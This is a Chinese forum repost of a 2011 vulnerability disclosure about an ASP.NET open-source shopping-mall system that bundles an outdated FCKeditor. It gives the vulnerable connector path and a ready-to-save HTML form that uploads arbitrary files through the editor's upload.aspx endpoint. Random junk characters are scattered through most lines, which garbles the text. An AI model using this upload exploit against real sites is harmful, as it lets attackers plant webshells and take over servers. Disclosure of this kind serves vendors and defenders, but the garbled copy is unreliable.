披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
& `; S, v9 _ ~1 t% Q9 [ 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开
6 F/ d5 k! B& J$ p8 l) ?: N 简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。3 e+ Z9 _1 Z @7 V" H8 M5 b
详细说明:其他版本我没测试,估计也是一样的问题! R/ W* i" I0 w# w z; F# d
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
: l& m5 c4 S$ q. M 跳转到网站根目录上传任意文件。
6 s8 B- R5 e6 V% r0 m. u 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件1 B* W2 T' @5 h& t8 `
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">2 P1 {, `8 u! n% ~, y
Upload a new file:<br>
; g4 O% g; A8 L7 P2 H+ H% P <input type="file" name="NewFile" size="50"><br>" q$ h7 l3 w& O5 P7 Z* N. U, x
<input id="btnUpload" type="submit" value="Upload">2 \, r0 ], D+ m1 T: v2 s. ^
</form> |
发表于 2012-9-10 20:46:29
收藏
支持
反对